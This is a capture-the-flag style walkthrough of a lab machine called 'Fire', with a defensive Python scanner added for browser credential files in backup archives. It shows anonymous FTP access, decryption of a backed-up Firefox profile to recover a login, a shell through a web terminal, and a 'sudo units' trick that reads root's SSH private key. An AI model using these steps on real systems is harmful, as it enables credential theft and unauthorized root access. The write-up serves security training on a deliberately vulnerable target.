# Lab setup
Download: Fire
NAT, IP: 192.168.1.133
# Penetration process
# Initial information gathering
```
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.7
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.133:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 4442576 Sep 29 2023 backup.zip
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=teste/organizationName=b8029c6b7a9c4c7d93fed3a3c6ab94bc
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2023-09-29T17:19:10
|_Not valid after: 2024-09-28T17:19:10
```
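FTP is open, so log in anonymously right away; this yields a backup file.
It contains mozilla/firefox. Since Firefox is involved, a quick search suggests this is a Firefox backup?
Download a decryption tool: firefox_decrypt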
```
┌──(root㉿kali)-[~/Desktop/firefox_decrypt-main]
└─# ./firefox_decrypt.py ../../mozilla/firefox
Select the Mozilla profile you wish to decrypt
1 -> 3m1uu7kd.default
2 -> pe1jatah.default-esr
2
Website: http://localhost
Username: 'marco'
Password: 'm@rc0!123'
```
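This gives a username and password, which work for logging in on port 9090.
After logging in, there is a terminal feature, which was used to get a shell directly.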
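From the defender's side, the root cause of this step is a backup archive that shipped a Firefox profile's login store together with its key database. The following added example (not part of the original write-up) scans a zip archive for that combination before it is published; the file contents and the exact files inside each profile of the sample archive are constructed assumptions, and only the profile directory names come from the output above.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Firefox profile files that hold saved logins and the keys protecting them.
CREDENTIAL_FILES = {
    "logins.json": "saved logins (encrypted)",
    "key4.db": "key database for saved logins",
    "key3.db": "legacy key database",
    "signons.sqlite": "legacy saved logins",
}

def find_browser_secrets(archive):
    """Return {profile_dir: sorted credential file names} for a zip archive."""
    hits = {}
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = PurePosixPath(info.filename)
            if path.name in CREDENTIAL_FILES:
                hits.setdefault(str(path.parent), set()).add(path.name)
    return {profile: sorted(names) for profile, names in hits.items()}

def decryptable_profiles(hits):
    """Profiles that ship both a login store and its key database."""
    stores = {"logins.json", "signons.sqlite"}
    keys = {"key4.db", "key3.db"}
    return sorted(p for p, n in hits.items() if stores & set(n) and keys & set(n))

def build_sample_backup():
    """Constructed sample archive mimicking the layout seen in the write-up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mozilla/firefox/profiles.ini", "[Profile0]\n")
        zf.writestr("mozilla/firefox/3m1uu7kd.default/times.json", "{}")
        zf.writestr("mozilla/firefox/pe1jatah.default-esr/logins.json", "{}")
        zf.writestr("mozilla/firefox/pe1jatah.default-esr/key4.db", b"")
        zf.writestr("mozilla/firefox/pe1jatah.default-esr/prefs.js", "")
    buf.seek(0)
    return buf

if __name__ == "__main__":
    found = find_browser_secrets(build_sample_backup())
    for profile in decryptable_profiles(found):
        print(f"[!] {profile}: {', '.join(found[profile])}")
```

A profile flagged by `decryptable_profiles` should be treated as a credential leak when no primary password is set, and the passwords stored in it rotated.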
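# Privilege escalation
```
sudo -l
```
The `units` command can be run with sudo; a look at its help output shows that it can read files.
```
sudo units -f /root/.ssh/id_rsa
```
This gives the private key.
Copy it over, clean it up and save it; root login is now possible.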